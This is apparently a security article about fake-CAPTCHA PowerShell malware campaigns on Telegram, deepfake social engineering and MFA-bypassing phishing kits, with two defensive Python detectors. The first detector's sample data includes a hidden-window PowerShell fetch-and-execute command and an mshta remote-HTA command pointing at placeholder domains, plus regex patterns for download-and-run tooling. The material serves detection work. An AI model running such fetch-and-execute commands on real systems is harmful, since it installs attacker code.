Telegram Captcha Attacks and Malicious Scripts

Rising Threats on Telegram

In recent months, there has been a significant surge in crypto scams and malware attacks targeting users on Telegram. Here are some key points:

  • Surge in Scams: Between November 2024 and January 2025, crypto scams on Telegram increased by 2,000%. These scams often involve malicious bots or counterfeit trading platforms that trick users into activating harmful code, granting attackers access to sensitive data such as passwords and crypto wallets [1].

  • Malware Infiltration: Attackers infiltrate legitimate Telegram groups and use fake invites to lure victims into fake communities. Once engaged, users are tricked into executing malicious scripts, which can lead to the installation of malware such as Lumma Stealer or similar threats [1][3].

Malicious PowerShell Scripts

Fake CAPTCHA Challenges

Several recent campaigns have utilized fake CAPTCHA challenges to deceive users into executing malicious scripts:

  • Lumma Stealer: In a campaign observed by CERT-AGID, Lumma Stealer used fake CAPTCHA warnings to trick users into executing PowerShell scripts that infected their systems. The malware steals sensitive information, and the campaign targeted GitHub repositories and Windows users [3].

  • KongTuke Campaign: This campaign uses injected scripts that create fake "verify you are human" pages. Users are tricked into copying and executing a malicious PowerShell script, leading to an infection that abuses the BOINC distributed-computing platform for malicious purposes [3].
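Both campaigns above share one execution shape: the victim copies a command from the fake CAPTCHA page and pastes it into the Windows Run dialog, so the script host is spawned by explorer.exe. The Python below is an added example, not code from this page or from any of the cited reports; it scans constructed process-creation events (fields modelled on Sysmon Event ID 1, not real telemetry) and flags a script host launched from explorer.exe whose command line carries the traits these campaigns rely on. The sample domains, user names, indicator list and the two-indicator threshold are all assumptions.

```python
"""Added example: flag the fake-CAPTCHA "paste this into Run" execution shape.

Scans constructed process-creation events (fields modelled on Sysmon Event ID 1;
not real telemetry) for a script host launched from explorer.exe, the parent the
Run dialog produces, whose command line carries the traits these campaigns use.
"""
import re

# Constructed sample events. Domains and users are placeholders, not real indicators.
SAMPLE_EVENTS = [
    {   # fake-CAPTCHA shape: explorer.exe -> powershell, hidden window, fetch-and-eval
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": 'powershell -w hidden -ep bypass -c "iex (iwr http://captcha-check.example/verify.txt -UseBasicParsing)"',
        "User": r"CORP\alice",
    },
    {   # same shape with mshta pulling remote HTA content
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\mshta.exe",
        "CommandLine": "mshta https://verify-human.example/robot.hta",
        "User": r"CORP\bob",
    },
    {   # benign: build agent running a local script, not launched from explorer.exe
        "ParentImage": r"C:\Program Files\Build\agent.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell -File C:\build\deploy.ps1",
        "User": r"CORP\svc_build",
    },
    {   # benign: ordinary application launched from the desktop
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\notepad.exe",
        "CommandLine": "notepad.exe",
        "User": r"CORP\alice",
    },
]

# Parent an interactive "paste and run" produces, and the script hosts the campaigns abuse
RUN_DIALOG_PARENTS = {"explorer.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe", "cscript.exe"}

# Command-line traits; each is a weak signal alone, the combination is what we alert on
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "encoded_command": re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "policy_bypass": re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I),
    "invoke_expression": re.compile(r"\biex\b|invoke-expression", re.I),
    "remote_fetch": re.compile(r"\b(?:iwr|invoke-webrequest|invoke-restmethod|downloadstring|curl|wget)\b", re.I),
    "url": re.compile(r"https?://", re.I),
}


def basename(path: str) -> str:
    """Last path component, lower-cased, for image comparisons."""
    return path.rsplit("\\", 1)[-1].lower()


def score_event(event: dict) -> list:
    """Return the indicator names an event matches; empty unless it has the
    explorer.exe -> script-host shape."""
    if basename(event["ParentImage"]) not in RUN_DIALOG_PARENTS:
        return []
    image = basename(event["Image"])
    if image not in SCRIPT_HOSTS:
        return []
    cmd = event["CommandLine"]
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmd)]
    # mshta fetching a URL is meaningful on its own, so it counts as a second signal
    if image == "mshta.exe" and "url" in hits:
        hits.append("mshta_remote_content")
    return hits


def find_suspicious(events, min_indicators: int = 2) -> list:
    """Events whose command line carries at least min_indicators traits."""
    findings = []
    for ev in events:
        hits = score_event(ev)
        if len(hits) >= min_indicators:
            findings.append({"user": ev["User"], "image": basename(ev["Image"]), "indicators": hits})
    return findings


if __name__ == "__main__":
    for f in find_suspicious(SAMPLE_EVENTS):
        print(f"{f['user']}: {f['image']} matched {', '.join(f['indicators'])}")
```

The explorer.exe parent is the load-bearing part of the rule: the same PowerShell flags under a build agent or a management tool are noise, while a hidden-window fetch-and-evaluate under the desktop shell is almost always a human who was told to paste something. On a host, the Run dialog history in the HKCU `Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU` key complements this telemetry, since it retains the pasted command even when process logging is absent.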

Social Engineering and Messaging Security

Deepfakes and Generative AI

Social engineering tactics have been significantly enhanced by the emergence of generative AI and deepfakes:

  • Psychological Manipulation: Deepfakes exploit psychological principles such as authority, trust, fear, urgency, reciprocity, and familiarity. They convincingly mimic real people, including executives or trusted individuals, to manipulate users into divulging sensitive information or performing unauthorized actions [2].

  • Automation and Personalization: Generative AI automates and personalizes phishing messages, while deepfakes enable highly believable impersonations. This combination scales the exploitation of human psychology, making social engineering attacks more effective and widespread [2].

Advanced Phishing Kits

The evolution of phishing kits, such as the Tycoon 2FA phishing kit, poses a significant threat to messaging security:

  • Bypassing 2FA: The latest version of Tycoon 2FA targets Microsoft 365 session cookies to bypass multi-factor authentication (MFA). It uses compromised email accounts, obfuscated source code, and measures that detect and block automated security scripts, making it harder for security tools to identify and analyze its phishing pages [5].

  • Evasion Techniques: The kit disables right-click menus, overwrites clipboard content, and redirects users to legitimate sites to mask its true purpose. These tactics help it evade detection by both automated tools and security analysts [5].
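Because the kit's page-level evasions are aimed at scanners and analysts, a detection that never looks at the phishing page is worth having. A kit that captures a session cookie after the victim passes MFA uses that cookie from a machine other than the victim's, so the same session identifier shows up from a second client fingerprint after the MFA event. The Python below is an added example, not code from this page or from any identity provider; the sign-in records, field names, placeholder addresses and the "both IP and user agent changed" rule are constructed assumptions rather than a real log schema.

```python
"""Added example: detect a session token replayed from a second client fingerprint.

After the victim passes MFA through a cookie-stealing kit, the token is used from
the attacker's machine, so one session identifier appears from a new IP address
and user agent. Records below are constructed; field names are assumptions, not
any provider's real sign-in schema.
"""
from collections import defaultdict
from datetime import datetime, timezone

# Constructed sign-in/activity records (addresses from documentation ranges)
SAMPLE_SIGNINS = [
    # alice passes MFA; the request arrives via the phishing proxy's address
    {"ts": "2025-02-10T09:00:00Z", "user": "alice@example.com", "session_id": "S1",
     "ip": "203.0.113.10", "ua": "Mozilla/5.0 (Windows NT 10.0) Chrome/122", "mfa": True},
    {"ts": "2025-02-10T09:00:30Z", "user": "alice@example.com", "session_id": "S1",
     "ip": "203.0.113.10", "ua": "Mozilla/5.0 (Windows NT 10.0) Chrome/122", "mfa": False},
    # the same cookie, minutes later, from a different address and browser
    {"ts": "2025-02-10T09:07:00Z", "user": "alice@example.com", "session_id": "S1",
     "ip": "198.51.100.77", "ua": "Mozilla/5.0 (X11; Linux x86_64) Firefox/115", "mfa": False},
    # bob: consistent fingerprint for the whole session
    {"ts": "2025-02-10T09:01:00Z", "user": "bob@example.com", "session_id": "S2",
     "ip": "192.0.2.5", "ua": "Mozilla/5.0 (Macintosh) Safari/17", "mfa": True},
    {"ts": "2025-02-10T10:30:00Z", "user": "bob@example.com", "session_id": "S2",
     "ip": "192.0.2.5", "ua": "Mozilla/5.0 (Macintosh) Safari/17", "mfa": False},
    # carol: laptop moved networks, same browser; should not alert
    {"ts": "2025-02-10T09:02:00Z", "user": "carol@example.com", "session_id": "S3",
     "ip": "192.0.2.20", "ua": "Mozilla/5.0 (Windows NT 10.0) Edge/122", "mfa": True},
    {"ts": "2025-02-10T09:40:00Z", "user": "carol@example.com", "session_id": "S3",
     "ip": "198.51.100.9", "ua": "Mozilla/5.0 (Windows NT 10.0) Edge/122", "mfa": False},
]


def parse_ts(value: str) -> datetime:
    """Parse the constructed ISO-8601 UTC timestamp format used above."""
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def detect_session_replay(records) -> list:
    """Alert when a session is used from a new IP *and* a new user agent after the
    MFA event that issued it. Requiring both to change keeps ordinary network
    roaming (same browser, new address) out of the alert set."""
    by_session = defaultdict(list)
    for rec in records:
        by_session[rec["session_id"]].append(rec)

    alerts = []
    for sid, events in by_session.items():
        events.sort(key=lambda r: parse_ts(r["ts"]))
        # the fingerprint that satisfied MFA is the one the token was issued to
        anchor = next((e for e in events if e["mfa"]), None)
        if anchor is None:
            continue
        for ev in events:
            if ev["ip"] == anchor["ip"] or ev["ua"] == anchor["ua"]:
                continue
            minutes = (parse_ts(ev["ts"]) - parse_ts(anchor["ts"])).total_seconds() / 60
            if minutes < 0:
                continue  # activity before MFA belongs to a different question
            alerts.append({
                "session_id": sid, "user": ev["user"], "minutes_after_mfa": round(minutes, 1),
                "mfa_ip": anchor["ip"], "replay_ip": ev["ip"],
                "reason": "session token used from a new IP and user agent after MFA",
            })
    return alerts


if __name__ == "__main__":
    for a in detect_session_replay(SAMPLE_SIGNINS):
        print(f"{a['user']} session {a['session_id']}: {a['reason']} "
              f"({a['mfa_ip']} -> {a['replay_ip']}, {a['minutes_after_mfa']} min)")
```

The rule is deliberately conservative: a single changed attribute is common for legitimate users, while a new address and a new browser on a cookie that was minted minutes earlier is the signature of a token leaving the device it was issued to. The durable mitigation is to bind tokens to the device or to require phishing-resistant, origin-bound authentication so that a proxied login does not yield a reusable cookie in the first place.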

Recommendations and Mitigations

  • User Vigilance: Users should avoid running unverified commands or installing suspicious software. Legitimate crypto platforms will never request such actions, and users should be vigilant in navigating online interactions [1].

  • Education and Awareness: Training programs should focus on teaching employees to recognize manipulation tactics, question unexpected requests, and verify the authenticity of communications. Building a culture of skepticism and critical thinking can help counteract the psychological vulnerabilities exploited by deepfakes and other social engineering tools [2].

  • Detection Technology: Deepfake detection solutions that leverage AI-powered models can help identify deepfakes and alert users in real time. These solutions can integrate into existing workflows without affecting operational efficiency [2].

By staying informed about these evolving threats and implementing robust security measures, individuals and organizations can better protect themselves against the rising tide of social engineering and malware attacks.